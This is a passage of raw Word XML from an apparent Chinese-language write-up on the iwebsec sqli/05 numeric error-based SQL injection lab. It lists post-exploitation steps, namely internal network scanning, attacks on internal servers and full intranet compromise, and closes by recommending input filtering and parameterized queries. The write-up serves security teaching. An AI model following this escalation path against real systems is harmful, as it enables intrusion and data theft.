    <w:p w14:paraId="7B81769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扫描内网：探测同网段其他服务器、数据库、终端设备；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE9B70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攻击内网设备：利用内网漏洞，入侵其他服务器、数据库，获取更多权限；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4381A41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- 控制内网：实现整个内网沦陷，造成大规模数据泄露和系统瘫痪。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245D77C3">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="heading_27"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>五、漏洞危害总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="0091C0D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iwebsec sqli/05 数字型报错注入漏洞属于高危安全漏洞，攻击者可利用该漏洞，从获取数据库敏感信息入手，逐步渗透至网站服务器、操作系统，最终实现网站失陷、服务器被控、数据泄露、业务瘫痪，甚至内网沦陷。该漏洞的核心成因是SQL语句未对输入参数进行过滤，直接拼接执行，因此，防范此类漏洞的关键是对所有用户输入进行严格过滤、采用参数化查询，避免SQL语句直接拼接。</w:t>
      </w:r>
      <w:bookmarkStart w:id="28" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="28"/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A0310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3CDC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6F1C35B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3853</Words>
  <Characters>5204</Characters>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6081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2026-04-14T02:44:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>萧泽亮</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-14T04:07:41Z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0C2039F16717483D95BF9155F9C76663_12</vt:lpwstr>
  </property>
</Properties>
</file>